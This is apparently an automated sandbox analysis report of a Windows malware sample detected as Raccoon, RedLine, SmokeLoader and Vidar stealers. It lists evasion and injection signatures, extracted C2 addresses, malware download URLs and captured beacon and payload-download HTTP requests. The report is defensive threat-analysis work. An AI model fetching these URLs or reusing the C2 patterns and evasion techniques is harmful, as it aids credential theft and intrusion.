Windows Analysis Report y8WngeDn4q.exe

Overview

General Information

Sample Name: y8WngeDn4q.exe
Analysis ID: 511828
MD5: 2ba5d1028f7babca366060bde97bf482
SHA1: 98c817b375bb002c37c8dfb778116e4c5d07cd79
SHA256: 555fd11933a1bb3a71714e1c234cdeaf7ea3c614f24eebec3786fb61cb3b5b5e
Tags: exe, RaccoonStealer

Detection

Raccoon RedLine SmokeLoader Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected AntiVM3
Yara detected Vidar
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Found malware configuration
Yara detected UAC Bypass using CMSTP
DLL reload attack detected
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Writes to foreign memory regions
Renames NTDLL to bypass HIPS
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Sigma detected: Powershell Defender Exclusion
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Yara detected Raccoon Stealer
Source: Yara match File source: 29.3.E4D7.exe.48e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.E4D7.exe.48e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.E4D7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.E4D7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001D.00000002.649599129.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.553896826.00000000048E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: E4D7.exe PID: 6552, type: MEMORYSTR
Antivirus detection for URL or domain
Source: http://sysaheu90.top/game.exe Avira URL Cloud: Label: malware
Source: http://znpst.top/dl/buildz.exe Avira URL Cloud: Label: malware
Source: http://privacytoolzforyou-6000.top/downloads/toolspab2.exe Avira URL Cloud: Label: malware
Source: http://toptelete.top/agrybirdsgamerept Avira URL Cloud: Label: malware
Source: http://hajezey1.top/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 0000001B.00000002.558722900.00000000048B0000.00000004.00000001.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://193.56.146.214/", "https://193.56.146.214/"]}
Source: 34.0.DataSvcUtil.exe.400000.1.unpack Malware Configuration Extractor: RedLine {"C2 url": ["45.9.20.149:10844"], "Bot Id": ""}
Multi AV Scanner detection for submitted file
Source: y8WngeDn4q.exe Virustotal: Detection: 36%
Multi AV Scanner detection for domain / URL
Source: privacytoolzforyou-6000.top Virustotal: Detection: 5%
Source: http://sysaheu90.top/game.exe Virustotal: Detection: 16%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\37D8.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\3AE.exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe ReversingLabs: Detection: 22%
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\60DF.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\B74C.exe ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\Temp\C651.exe ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\D083.exe ReversingLabs: Detection: 32%
Machine Learning detection for sample
Source: y8WngeDn4q.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\E11F.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DAA6.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B74C.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FBAD.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\gbdfufc Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\csdfufc Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\esdfufc Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FC0C.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8908.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C651.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\D083.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 15.0.8908.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.8908.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.0.esdfufc.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.0.esdfufc.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.8908.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.0.esdfufc.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.0.esdfufc.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 15.0.8908.exe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 00000013.00000003.572995540.0000000006BEB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 37D8.exe PID: 6468, type: MEMORYSTR

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe Unpacked PE file: 29.2.E4D7.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\C651.exe Unpacked PE file: 41.2.C651.exe.400000.0.unpack
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.6:49835 version: TLS 1.0
Uses 32bit PE files
Source: y8WngeDn4q.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.6:49799 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.6:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 81.177.141.36:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: Binary string: C:\vojos\fuw.pdb source: 4EDC.exe, 00000016.00000002.528243755.0000000000417000.00000002.00020000.sdmp, csdfufc.6.dr
Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdbp source: DAA6.exe.6.dr
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000019.00000002.527231593.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001C.00000002.528560998.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000021.00000002.570535756.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000024.00000000.565833998.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.19.dr
Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdb source: DAA6.exe.6.dr
Source: Binary string: C:\ciwomo siju28 nijohon\93-loze\2.pdb source: 6E1E.exe, gbdfufc.6.dr
Source: Binary string: +C:\tuy.pdb` source: y8WngeDn4q.exe
Source: Binary string: C:\lewusukoviv.pdb source: FBAD.exe.6.dr
Source: Binary string: C:\tuy.pdb source: y8WngeDn4q.exe
Source: Binary string: wntdll.pdbUGP source: 4EDC.exe, 00000016.00000002.530995436.000000006BFE1000.00000020.00020000.sdmp, 1105.tmp.22.dr
Source: Binary string: wntdll.pdb source: 4EDC.exe, 1105.tmp.22.dr
Source: Binary string: `C:\ciwomo siju28 nijohon\93-loze\2.pdb` source: 6E1E.exe, 0000001B.00000000.521192744.0000000000401000.00000020.00020000.sdmp, gbdfufc.6.dr
Source: Binary string: bC:\ciyomolibit\vowudavumaz68\fubevu\vatatageh\yayawav\duji.pdb` source: E4D7.exe.6.dr
Source: Binary string: :C:\venu4-divilavujar1.pdb` source: B74C.exe.6.dr
Source: Binary string: C:\lewusukoviv.pdb` source: FBAD.exe.6.dr
Source: Binary string: C:\tosofom\yopuk.pdb source: C651.exe.6.dr
Source: Binary string: C:\venu4-divilavujar1.pdb source: B74C.exe.6.dr
Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxzip32\Release\sfxzip.pdb source: E11F.exe.6.dr
Source: Binary string: C:\ciyomolibit\vowudavumaz68\fubevu\vatatageh\yayawav\duji.pdb source: E4D7.exe.6.dr
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\E4D7.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.6:49859 -> 194.180.174.181:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: iyc.jelikob.ru
Source: C:\Windows\explorer.exe Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe Domain query: znpst.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80
Source: C:\Windows\explorer.exe Domain query: nusurtal4f.net
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe Domain query: hajezey1.top
Source: C:\Windows\explorer.exe Domain query: sysaheu90.top
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://193.56.146.214/
Source: Malware configuration extractor URLs: https://193.56.146.214/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903333369742491648/1E88D378.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 132Host: 194.180.174.181
Source: global traffic HTTP traffic detected: GET //l/f/UJ1rynwB3dP17Spz23JR/c8a165d96af5f02e4cac679a1908533dbdcac0e8 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 15:54:58 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 15:54:01 GMTETag: "54e00-5cf7fd603d2d5"Accept-Ranges: bytesContent-Length: 347648Connection: closeContent-Type: application/octet-stream
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 15:55:37 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 15:55:02 GMTETag: "93200-5cf7fd9a22b51"Accept-Ranges: bytesContent-Length: 602624Connection: closeContent-Type: application/octet-stream
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 15:56:05 GMTServer: Apache/2.4.6 (CentOS) PHP/5.6.40Last-Modified: Fri, 29 Oct 2021 15:50:01 GMTETag: "d6400-5cf7fc7b02802"Accept-Ranges: bytesContent-Length: 877568Connection: closeContent-Type: application/octet-stream
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 15:56:11 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytes
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.6:49835 version: TLS 1.0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /263873486.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: iyc.jelikob.ru
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://agvlhndt.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dyrgluo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: hajezey1.top
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ctwwxytaud.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wpicrcm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fklpf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bxdspskl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://isiuwvkkoj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pmdvv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jyoho.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fpdmgcvxb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fxurvqy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vlsulvkdg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cwdaqy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://llaraxn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jibms.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mowuyooy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://okikkrhv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pjlnqmhpvc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hcgnyqptt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ithapmr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gauqw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vqosa.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kdacdmichm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fsluxk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dpiqpnl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tysqt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dhskdgpx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oihlnqbyqp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 298Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xbtscsiiqr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: hajezey1.top
Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fchldji.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://narjywxfra.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pkxhixnn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xjjqkp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sqgxbwy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yvrtx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vyivfmetg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wdgyfowqds.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: znpst.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: nusurtal4f.net
